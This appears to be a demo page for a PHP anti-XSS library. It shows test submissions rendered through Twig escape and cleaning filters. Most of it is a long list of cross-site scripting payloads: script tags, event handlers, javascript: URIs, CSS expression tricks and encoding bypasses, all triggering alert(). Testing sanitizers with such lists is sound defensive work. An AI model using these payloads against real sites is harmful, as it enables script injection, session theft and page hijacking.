Anti-XSS for PHP

X
XXX
 <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>

result with twig: {{ xss.xss | escape }}:

<script\x20type="text/javascript">javascript:alert(0);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(2);</script>
<script\x09type="text/javascript">javascript:alert(3);</script>
<script\x0Ctype="text/javascript">javascript:alert(4);</script>
<script\x2Ftype="text/javascript">javascript:alert(5);</script>
<script\x0Atype="text/javascript">javascript:alert(6);</script>
'`"><\x3Cscript>javascript:alert(7)</script>        
'`"><\x00script>javascript:alert(8)</script>
<img src=1 href=1 onerror="javascript:alert(9)"></img>
<audio src=1 href=1 onerror="javascript:alert(10)"></audio>
<video src=1 href=1 onerror="javascript:alert(11)"></video>
<body src=1 href=1 onerror="javascript:alert(12)"></body>
<image src=1 href=1 onerror="javascript:alert(13)"></image>
<object src=1 href=1 onerror="javascript:alert(14)"></object>
<script src=1 href=1 onerror="javascript:alert(15)"></script>
<svg onResize svg onResize="javascript:javascript:alert(16)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(17)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(18)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(19)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(20)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(21)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(22)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(23)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(24)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(25)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(26)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(27)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(28)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(29)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(30)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(31)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(32)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(33)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(34)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(35)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(36)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(37)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(38)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(39)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(40)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(41)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(42)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(43)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(44)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(45)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(46)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(47)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(48)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(49)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(50)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(51)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(52)"></body onResize>
<object onError object onError="javascript:javascript:alert(53)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(54)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(55)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(56)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(57)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(58)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(59)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(60)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(61)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(62)"></iframe onload>
<body onload body onload="javascript:javascript:alert(63)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(64)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(65)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(66)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(67)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(68)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(69)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(70)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(71)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(72)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(73)"></body onblur>
\x3Cscript>javascript:alert(74)</script>
'"`><script>/* *\x2Fjavascript:alert(75)// */</script>
<script>javascript:alert(76)</script\x0D
<script>javascript:alert(77)</script\x0A
<script>javascript:alert(78)</script\x0B
<script charset="\x22>javascript:alert(79)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(80)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(81)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(82)> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(83)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(84)> -->
`"'><img src='#\x27 onerror=javascript:alert(85)>
<a href="javascript\x3Ajavascript:alert(86)" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(87)//';</script></p>
<a href="javas\x00cript:javascript:alert(88)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(89)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(90)" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:alert(91)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(92)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(93)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(94)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(95)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(96)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(97)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(98)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(99)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(100)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(101)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(102)// */</script>
<script>/* *\x00/javascript:alert(103)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(104)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(105)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(106)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(107)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(108)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(109);/*';">DEF 
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(110);/*';">DEF 
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(111);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(112);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(113);}</script>
'`"><\x3Cscript>javascript:alert(114)</script>
'`"><\x00script>javascript:alert(115)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(116)>
"'`><\x00img src=xxx:x onerror=javascript:alert(117)>
<script src="data:text/plain\x2Cjavascript:alert(118)"></script>
<script src="data:\xD4\x8F,javascript:alert(119)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(120)"></script>
<script src="data:\xCB\x8F,javascript:alert(121)"></script>
<script\x20type="text/javascript">javascript:alert(122);</script>
<script\x3Etype="text/javascript">javascript:alert(123);</script>
<script\x0Dtype="text/javascript">javascript:alert(124);</script>
<script\x09type="text/javascript">javascript:alert(125);</script>
<script\x0Ctype="text/javascript">javascript:alert(126);</script>
<script\x2Ftype="text/javascript">javascript:alert(127);</script>
<script\x0Atype="text/javascript">javascript:alert(128);</script>
ABC<div style="x\x3Aexpression(javascript:alert(129)">DEF
ABC<div style="x:expression\x5C(javascript:alert(130)">DEF
ABC<div style="x:expression\x00(javascript:alert(131)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(132)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(133)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(134)">DEF
ABC<div style="x:\x09expression(javascript:alert(135)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(136)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(137)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(138)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(139)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(140)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(141)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(142)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(143)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(144)">DEF
ABC<div style="x:\x20expression(javascript:alert(145)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(146)">DEF
ABC<div style="x:\x00expression(javascript:alert(147)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(148)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(149)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(150)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(151)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(152)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(153)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(154)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(155)">DEF
<a href="\x0Bjavascript:javascript:alert(156)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(157)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(158)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(159)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(160)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(161)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(162)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(163)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(164)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(165)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(166)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(167)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(168)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(169)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(170)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(171)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(172)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(173)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(174)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(175)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(176)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(177)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(178)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(179)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(180)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(181)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(182)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(183)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(184)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(185)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(186)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(187)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(188)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(189)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(190)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(191)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(192)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(193)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(194)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(195)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(196)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(197)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(198)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(199)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(200)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(201)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(202)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(203)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(204)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(205)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(206)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(207)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(208)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(209)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(210)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(211)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(212)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(213)>
`"'><img src=xxx:x \x22onerror=javascript:alert(214)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(215)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(216)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(217)>
`"'><img src=xxx:x \x09onerror=javascript:alert(218)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(219)>
`"'><img src=xxx:x \x00onerror=javascript:alert(220)>
`"'><img src=xxx:x \x27onerror=javascript:alert(221)>
`"'><img src=xxx:x \x20onerror=javascript:alert(222)>
"`'><script>\x3Bjavascript:alert(223)</script>
"`'><script>\x0Djavascript:alert(224)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(225)</script>
"`'><script>\xE2\x80\x81javascript:alert(226)</script>
"`'><script>\xE2\x80\x84javascript:alert(227)</script>
"`'><script>\xE3\x80\x80javascript:alert(228)</script>
"`'><script>\x09javascript:alert(229)</script>
"`'><script>\xE2\x80\x89javascript:alert(230)</script>
"`'><script>\xE2\x80\x85javascript:alert(231)</script>
"`'><script>\xE2\x80\x88javascript:alert(232)</script>
"`'><script>\x00javascript:alert(233)</script>
"`'><script>\xE2\x80\xA8javascript:alert(234)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(235)</script>
"`'><script>\xE1\x9A\x80javascript:alert(236)</script>
"`'><script>\x0Cjavascript:alert(237)</script>
"`'><script>\x2Bjavascript:alert(238)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(239)</script>
"`'><script>-javascript:alert(240)</script>
"`'><script>\x0Ajavascript:alert(241)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(242)</script>
"`'><script>\x7Ejavascript:alert(243)</script>
"`'><script>\xE2\x80\x87javascript:alert(244)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(245)</script>
"`'><script>\xE2\x80\xA9javascript:alert(246)</script>
"`'><script>\xC2\x85javascript:alert(247)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(248)</script>
"`'><script>\xE2\x80\x83javascript:alert(249)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(250)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(251)</script>
"`'><script>\xE2\x80\x80javascript:alert(252)</script>
"`'><script>\x21javascript:alert(253)</script>
"`'><script>\xE2\x80\x82javascript:alert(254)</script>
"`'><script>\xE2\x80\x86javascript:alert(255)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(256)</script>
"`'><script>\x0Bjavascript:alert(257)</script>
"`'><script>\x20javascript:alert(258)</script>
"`'><script>\xC2\xA0javascript:alert(259)</script>
"/><img/onerror=\x0Bjavascript:alert(260)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(261)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(262)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(263)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(264)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(265)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(266)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(267)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(268)\x20src=xxx:x />
<script\x2F>javascript:alert(269)</script>
<script\x20>javascript:alert(270)</script>
<script\x0D>javascript:alert(271)</script>
<script\x0A>javascript:alert(272)</script>
<script\x0C>javascript:alert(273)</script>
<script\x00>javascript:alert(274)</script>
<script\x09>javascript:alert(275)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(276)>
`"'><img src=xxx:x onerror\x00=javascript:alert(277)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(278)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(279)>
`"'><img src=xxx:x onerror\x20=javascript:alert(280)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(281)>
`"'><img src=xxx:x onerror\x09=javascript:alert(282)>
<script>javascript:alert(283)<\x00/script>
<img src=# onerror\x3D"javascript:alert(284)" >
<input onfocus=javascript:alert(285) autofocus>
<input onblur=javascript:alert(286) autofocus><input autofocus>
<video poster=javascript:javascript:alert(287)//
<body onscroll=javascript:alert(288)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(289)><input></form><button form=test onformchange=javascript:alert(290)>X
<video><source onerror="javascript:javascript:alert(291)">
<video onerror="javascript:javascript:alert(292)"><source>
<form><button formaction="javascript:javascript:alert(293)">X
<body oninput=javascript:alert(294)><input autofocus>
<math href="javascript:javascript:alert(295)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(296)">CLICKME</maction> </math>
<frameset onload=javascript:alert(297)>
<table background="javascript:javascript:alert(298)">
<!--<img src="--><img src=x onerror=javascript:alert(299)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(300))//">
<![><img src="]><img src=x onerror=javascript:alert(301)//">
<style><img src="</style><img src=x onerror=javascript:alert(302)//">
<li style=list-style:url() onerror=javascript:alert(303)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(304)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(305)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(306)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(307)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(308)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'>
<embed src="javascript:alert(311)">
<img src="javascript:alert(312)">
<image src="javascript:alert(313)">
<script src="javascript:alert(314)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(315)>x
<? foo="><script>javascript:alert(316)</script>">
<! foo="><script>javascript:alert(317)</script>">
</ foo="><script>javascript:alert(318)</script>">
<? foo="><x foo='?><script>javascript:alert(319)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>">
<% foo><x foo="%><script>javascript:alert(321)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(323)">
<img \x47src=x onerror="javascript:alert(324)">
<img \x11src=x onerror="javascript:alert(325)">
<img \x12src=x onerror="javascript:alert(326)">
<img\x47src=x onerror="javascript:alert(327)">
<img\x10src=x onerror="javascript:alert(328)">
<img\x13src=x onerror="javascript:alert(329)">
<img\x32src=x onerror="javascript:alert(330)">
<img\x47src=x onerror="javascript:alert(331)">
<img\x11src=x onerror="javascript:alert(332)">
<img \x47src=x onerror="javascript:alert(333)">
<img \x34src=x onerror="javascript:alert(334)">
<img \x39src=x onerror="javascript:alert(335)">
<img \x00src=x onerror="javascript:alert(336)">
<img src\x09=x onerror="javascript:alert(337)">
<img src\x10=x onerror="javascript:alert(338)">
<img src\x13=x onerror="javascript:alert(339)">
<img src\x32=x onerror="javascript:alert(340)">
<img src\x12=x onerror="javascript:alert(341)">
<img src\x11=x onerror="javascript:alert(342)">
<img src\x00=x onerror="javascript:alert(343)">
<img src\x47=x onerror="javascript:alert(344)">
<img src=x\x09onerror="javascript:alert(345)">
<img src=x\x10onerror="javascript:alert(346)">
<img src=x\x11onerror="javascript:alert(347)">
<img src=x\x12onerror="javascript:alert(348)">
<img src=x\x13onerror="javascript:alert(349)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)">
<img src=x onerror=\x09"javascript:alert(351)">
<img src=x onerror=\x10"javascript:alert(352)">
<img src=x onerror=\x11"javascript:alert(353)">
<img src=x onerror=\x12"javascript:alert(354)">
<img src=x onerror=\x32"javascript:alert(355)">
<img src=x onerror=\x00"javascript:alert(356)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(357)>XXX</a>
<img src="x` `<script>javascript:alert(358)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(359)//">
<title onpropertychange=javascript:alert(360)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>">
<!--[if]><script>javascript:alert(362)</script -->
<!--[if<img src=x onerror=javascript:alert(363)//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(364)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(365)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(366)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(367))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(368))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(369);">XXX</a></a><a href="javascript:javascript:alert(370)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo&#10;;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(371)\29>
<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(372))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(373));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
<div id="x">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>

keyword(s): test

description: test

by test | at 2020-11-23 00:09:18

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

keyword(s): test

description: test

by test | at 2020-11-23 00:07:08

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
< >
<META ;
<IMG  >
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
"><IFRAME SRC="alert('XSS');"></IFRAME>">123
"><IFRAME SRC=# ></IFRAME>123
<IFRAME SRC="alert('XSS');"></IFRAME>
<IFRAME SRC=# ></IFRAME>
"><IFRAME SRC=# ></IFRAME>123
"></iframe><iframe frameborder="0%EF%BB%BF
"><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" ></IFRAME>123
"><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123
><IFRAME width="420" height="315" frameborder="0" ></IFRAME>Hover the cursor to the LEFT of this Message&ParamHeight=250
<IFRAME width="420" height="315" frameborder="0" ></IFRAME>
"><IFRAME SRC="alert('XSS');"></IFRAME>">123
"><IFRAME SRC=# ></IFRAME>123
<iframe src=http://xss.rocks/scriptlet.html <
<IFRAME SRC="alert('XSS');"></IFRAME>

result with twig: {{ xss.xss | escape }}:

<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
